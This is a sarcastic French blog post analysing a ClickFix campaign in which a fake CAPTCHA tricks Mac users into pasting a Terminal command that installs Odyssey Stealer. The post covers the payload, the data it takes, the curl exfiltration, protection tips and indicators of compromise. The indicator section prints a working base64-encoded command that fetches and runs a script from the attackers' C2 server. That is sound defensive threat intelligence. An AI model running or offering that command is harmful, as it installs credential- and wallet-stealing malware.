Bienvenue dans lâĂšre du ClickFix 2.0, oĂč les cybercriminels exploitent la confiance naĂŻve et le snobisme sĂ©curitaire des utilisateurs Mac. Cette fois, pas besoin de binaire louchant dans ton Finder, pas de pop-up douteuse qui demande un .dmg. Non, ici lâennemi, câest toi. Oui, toi, qui tapes religieusement une commande trouvĂ©e sur une page web parce que tu crois passer un CAPTCHA « intelligent ».
On avait dĂ©jĂ parlĂ© de Clickfix : đ§Ź ClickFix : le CAPTCHA que vous allez regretter dâavoir cochĂ©
Ah, les utilisateurs de Mac⊠Toujours convaincus dâĂȘtre au-dessus de la mĂȘlĂ©e numĂ©rique.
« Moi ? InfectĂ© ? Non mais enfin, jâai un Mac, voyons ! »
Spoiler : ce mythe vient de prendre une balle en pleine pomme đđ„.
đ€Ą Le scĂ©nario : un CAPTCHA qui teste ton QI (spoiler, tu perds)
Les attaquants ont inventĂ© une ruse digne dâun tour de passe-passe de David Copperfield.
- Tu arrives sur un site légitime en apparence (
tradingviewen[.]com). - Tu tombes sur une page avec un faux CAPTCHA : « Prouvez que vous ĂȘtes humain : ouvrez Terminal et collez ça ».
- Lâutilisateur, dĂ©jĂ convaincu que macOS est impĂ©nĂ©trable comme Fort Knox, sâexĂ©cute.
RĂ©sultat : un echo "base64 âŠ" | bash sâexĂ©cute, et BOUM đŁ, tu viens dâinviter Odyssey Stealer chez toi. Pas besoin de .exe, pas besoin de .pkg, pas mĂȘme un pauvre .app : juste ta confiance aveugle et ton copier-coller malheureux.
đ”ïžââïž Le payload : AppleScript, mais pas celui qui te fait gagner du temps
Le code injecté déploie un AppleScript obfusqué planqué dans /tmp.
Mission :
- Fouiller ton bureau et tes documents Ă la recherche deÂ
.pdf,Â.docx,Â.txt (tu sais, le fichier « motsdepasse.txt » que tu pensais malin de cacher dans un sous-dossier) ; - RĂ©cupĂ©rer tes cookies Safari et ton Keychain (donc tes logins iCloud, Google, ton Slack pro, etc.) ;
- Explorer Firefox, Chrome, Edge, Brave, Opera (oui, mĂȘme Opera, paix Ă son Ăąme) ;
- Et surtout : sniffer toutes traces de wallets crypto (Exodus, Wasabi, ElectrumâŠ).
En gros, ton Mac devient un buffet libre pour cybercriminels affamés.
đ Lâexfiltration : ZIP express, destination Russie (ou pire)
Une fois lâaspirateur passĂ©, le script compresse tout en un petit out.zip planquĂ© dans /tmp.
Ensuite, un simple curl lâenvoie Ă une IP (45.146.130[.]131), qui sert de panneau de contrĂŽle Odyssey Stealer.
Puis, nettoyage : /tmp effacĂ© â pas de traces â pas dâindices â pas de whisky pour les analystes forensic.
Les attaquants se retrouvent avec ton historique, tes cookies de session (donc accÚs direct à ton Gmail / LinkedIn sans mot de passe), et possiblement tes clés crypto.
Toi ? Tu continues Ă poster sur Mastodon que « macOS nâa pas besoin dâantivirus ».
đ§š Pourquoi câest un problĂšme en entreprise
Ă la maison, tu perds tes cryptos et tes notes de shopping.
En entreprise ? Tu perds :
- Ton compte AD (parce que ton Mac est joint au domaine comme un grand),
- Tes accĂšs VPN,
- Tes sessions SaaS (Teams, Salesforce, etc.),
- Tes partages de fichiers (bonjour le ransomware).
Le Mac, longtemps perçu comme un enfant gĂątĂ© intouchable, devient alors le cheval de Troie qui flingue tout le rĂ©seau. Et non, ce nâest pas de la science-fiction.
đ± Et iOS dans tout ça ?
Bonne nouvelle (temporairement) : iOS est relativement Ă©pargnĂ©. Le sandboxing et lâabsence de terminal copiable-collable bloquent ce genre dâattaque.
Mauvaise nouvelle : les attaquants adorent innover. Demain, ça peut passer par :
- Des profils MDM piégés (installés via un lien « corporate » fake),
- Du sideloading dâapp hors App Store,
- Des pages Safari qui abusent dâexploits WebKit.
Bref, ton iPhone nâest pas encore dans la ligne de mire du ClickFix, mais ça viendra.
đĄïž Comment se protĂ©ger (et Ă©viter de passer pour un pigeon)
- Sensibilisation : on ne copie-colle jamais une commande trouvée sur un site web random.
- EDR / NGFWÂ : surveillerÂ
/tmp, bloquer les IPs et URLs de C2. - Crypto : séparer ton wallet de ton poste de travail principal (Ledger > MacBook).
- Admins IT : surveiller les Mac en AD comme des Windows â patchs, EDR, logs centralisĂ©s.
- Utilisateurs Mac : arrĂȘtez de croire que « ça nâarrive quâaux autres ».
đ§Ÿ IOC â Indicators of Compromise
đ Ă utiliser pour bloquer, monitorer ou investiguer :
đ Domaines malveillants
tradingviewen[.]com
đ URLs observĂ©es
hxxp://45.146.130[.]131/d/vipx14350 (AppleScript malveillant)hxxp://45.146.130[.]131/log (exfiltration de données)
đ» Adresse IP
45.146.130[.]131 â Serveur C2 identifiĂ© (Odyssey Stealer)
đ Artefacts locaux
/tmp/out.zip â archive exfiltrĂ©e avant envoi- RĂ©pertoire temporaireÂ
/tmp/* (nettoyĂ© en fin dâexĂ©cution) - Processus liĂ©s :Â
osascript,Âcurl,Âbase64 -d | bash
â ïž Commande suspecte typique
echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash
đ Conseils rapides aux SOC/Blue Teams :
- Surveiller toute utilisation inhabituelle deÂ
base64 -d | bash. - MonitorerÂ
osascript dĂ©clenchĂ© depuis Terminal. - VĂ©rifier logs proxy/pare-feu pour trafic versÂ
45.146.130[.]131. - Inspecter toute crĂ©ation/suppression rapide de fichiers dansÂ
/tmp/.
đŹ Conclusion sarcastique
Mac nâest plus un Ăźlot paradisiaque flottant au-dessus du cyber-chaos.
Avec Odyssey Stealer et ClickFix, les attaquants ont trouvĂ© le moyen dâutiliser ta propre main pour tirer la gĂąchette.
Alors oui, tu peux continuer Ă dire « je nâai pas dâantivirus, je suis sous Mac ». Mais rappelle-toi : quand tu tapes base64 -d | bash comme un bon petit soldat, ce nâest plus un MacBook Pro. Câest un MacBook Powned.
